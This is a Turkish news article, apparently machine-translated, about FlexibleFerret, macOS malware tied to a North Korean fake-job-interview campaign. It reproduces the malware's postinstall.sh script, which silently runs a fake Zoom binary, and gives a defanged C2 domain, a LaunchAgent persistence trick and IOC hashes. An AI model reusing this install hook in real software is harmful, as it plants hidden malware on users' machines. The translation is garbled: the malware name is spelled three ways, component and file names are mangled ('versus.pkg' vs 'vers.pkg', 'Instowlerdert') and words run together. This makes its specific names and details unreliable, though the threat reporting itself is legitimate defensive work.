Esnekleştirme olarak bilinen yeni bir kötü amaçlı yazılım varyantı, Apple’ın XProtect aracıyla algılamadan kaçarken MacOS kullanıcılarını hedefleyen tanımlanmıştır.
Bu kötü amaçlı yazılım, kurbanları kötü amaçlı yazılımlar kurmaya teşvik etmek için sofistike taktikler kullanan Kuzey Kore tehdit aktörlerine atfedilen daha geniş bir kampanyanın bir parçasıdır.
FrostyFerret_ui ve FriendlyFerret_Secd gibi varyantlar dahil olmak üzere kötü amaçlı yazılım ailesi ilk olarak Aralık 2023’te bildirildi.
Bu kötü amaçlı yazılım bileşenleri, tehdit aktörlerinin iş arayanları, sanal görüşmeler için gerekli yazılım olarak maskelenerek kötü amaçlı yazılım kurmaya yönlendirdiği “bulaşıcı görüşme” kampanyasıyla ilişkilidir.
.webp)
Bunun yanı sıra, SentinelOne’daki siber güvenlik uzmanları, Apple’ın bu varyantların bazılarını engellemek için yakın zamanda XPROTECT’i güncellediğini keşfetti, ancak FlexibleFerret tespit edilmedi.
FlexableFerret Analizi
FlexibleFerret, bir Apple yükleyici paketi aracılığıyla dağıtılır. versus.pkgbunlar dahil olmak üzere birkaç kötü niyetli bileşen içerir InstallerAlert.app– versus.appve bağımsız bir ikili zoom.
.webp)
. postinstall.sh Komut dosyası, kurulumdan sonra bu bileşenleri yürütmek için kullanılır ve ilerlemesini günlüğe kaydederek /tmp/postinstall.log.
# Log the start of the script
echo "$(date): Running post-installation script..." >> /tmp/postinstall.log
# Check if the zoom file exists and execute it
if [ -f /var/tmp/zoom ]; then
echo "$(date): Zoom file exists, executing..." >>/tmp/postinstall.log
/var/tmp/zoom >> /tmp/postinstall.log 2>&1 &
else
echo "$(date): Zoom file not found" >> /tmp/postinstall.log
fiSahte zoom İkili etki alanı ile iletişim kurar zoom.callservice[.]usbu meşru bir zoom alanı değildir.
Bu sırada, InstallerAlert.app Kullanıcıları, bir hata mesajı görüntüleyerek meşru bir uygulama olduğunu düşünürken, etiketle kullanıcının kitaplık lansmanları klasörüne gizlice bir kalıcılık öğesi yüklerken com.zoom.plist.
.webp)
Bulaşıcı röportaj kampanyası, iş arayanları GitHub gibi platformlara dahil etmek için hedeflemenin ötesine geçti. Tehdit aktörleri, kötü amaçlı yazılım damlalarını dağıtmak için meşru depolarda sahte sorunlar kullanıyor.
Kullanıcılara güvenilmeyen kaynaklardan yazılım yüklerken ve güvenlik yazılımlarını güncel tutmaları tavsiye edilir.
Uzlaşma Göstergeleri (IOCS)
- vers.pkg:
388ac48764927fa353328104d5a32ad825af51ce - Instowlerdert Mach-OS:
1a28013e4343fddf13e5c721f91970e942073b88–3e16c6489bac4ac2d76c555eb1c263cd7e92c9a5–76e3cb7be778f22d207623ce1907c1659f2c8215
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free